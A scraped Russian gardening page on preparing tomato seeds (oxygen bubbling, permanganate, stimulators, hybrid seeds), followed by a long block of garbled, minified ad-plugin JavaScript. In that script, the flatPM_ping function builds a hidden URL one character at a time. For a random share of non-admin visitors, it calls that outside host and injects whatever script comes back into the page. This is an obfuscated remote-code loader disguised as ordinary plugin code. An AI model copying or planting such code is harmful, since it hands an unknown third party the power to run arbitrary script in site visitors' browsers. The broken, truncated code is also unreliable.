Садоводы, у которых есть в наличии аквариумный компрессор, проводят процедуру замачивания семян томатов для посадки на рассаду в жидкости, насыщаемой кислородом. Семена в марлевом мешочке помещаются в стеклянную литровую банку, наполненную водой. В сосуд вставляется компрессорный шланг и кислород поступает в емкость.

Семена этой культуры проходят процедуру барботирования около восемнадцати часов.

После этого процесса посадочный материал как следует просушивается и через некоторое время высаживается в грунт.

Барботирование – очень эффективный способ. Улучшает всхожесть семян.

Несколько схем подготовки семян помидоров к посеву

Важно не перестараться на подготовительном этапе – ведь от обилия средств и методов разбегаются глаза. Ниже мы приведем пару простых схем подготовки (последовательность действий – сами процессы описаны выше).

Первая, самая простая

  1. Обработка раствором марганцовки 20-30 мин.
  2. Проращивание во влажной ткани 3-5 дней.

Вторая, со стимуляторами

Подходит для старых семян или тех, у которых не известен срок годности.

  1. Дезинфекция 20 мин в растворе марганцовки, промыть водой.
  2. БАВ: 18 ч. в растворе Эпина или Циркона.
  3. Проращивание семян томатов, высадка.

Особенности обработки семян гибридов

Большинство садоводов собирает свои семена помидор для рассады. Многие приобретают семенной материал в специализированных магазинах. Такой посадочный материал не требуют серьезной обработки перед посевом.

Заводские гибридные сорта томатов проходят обработку уже на предприятии и дома повторять ее не нужно. Иногда попытка улучшить качество всхожести гибридных видов помидор заканчивается отсутствием всходов.

Внимательно читайте упаковку! Обработанные производителем семена обычно имеют неестественную окраску.

Надеемся, наша статья подробно ответила на вопрос: какими методами обработки семян томатов можно воспользоваться, а какими можно пренебречь?

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};